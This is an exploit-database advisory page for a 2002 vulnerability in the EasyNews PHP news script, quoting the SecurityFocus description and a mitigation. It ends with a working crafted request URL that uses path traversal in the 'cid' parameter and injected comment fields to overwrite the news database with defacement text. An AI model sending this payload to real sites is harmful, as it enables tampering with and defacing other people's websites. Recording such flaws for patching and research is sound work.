header-logo
Suggest Exploit
vendor:
EasyNews
by:
SecurityFocus
7.5
CVSS
HIGH
Remote Code Execution
94
CWE
Product Name: EasyNews
Affected Version From: 1
Affected Version To: 1.2
Patch Exists: YES
Related CWE: N/A
CPE: //a:easynews
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2002

EasyNews Remote Vulnerability

EasyNews is prone to a vulnerability which may allow a remote attacker to modify information in its Newsdatabase. As a result, a remote attacker may post unmoderated comments or possibly modify information in the templates used by EasyNews. This may be exploited via a specially crafted web request.

Mitigation:

Upgrade to the latest version of EasyNews and ensure that all security patches are applied.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/3643/info

EasyNews is a free, open-source script for displaying news stories on a website.

EasyNews is prone to a vulnerability which may allow a remote attacker to modify information in its Newsdatabase. As a result, a remote attacker may post unmoderated comments or possibly modify information in the templates used by EasyNews.

This may be exploited via a specially crafted web request.

Earlier versions may also be vulnerable.

http://[target]/index.php?action=comments&do=save&id=1&cid=../news&name=11/1
1/11&kommentar=%20&email=hax0r&zeit=you%20suck,11:11,../news,bugs@securityal
ert.com&datum=easynews%20exploited

Navigation

Suggest Exploit

Services By CQR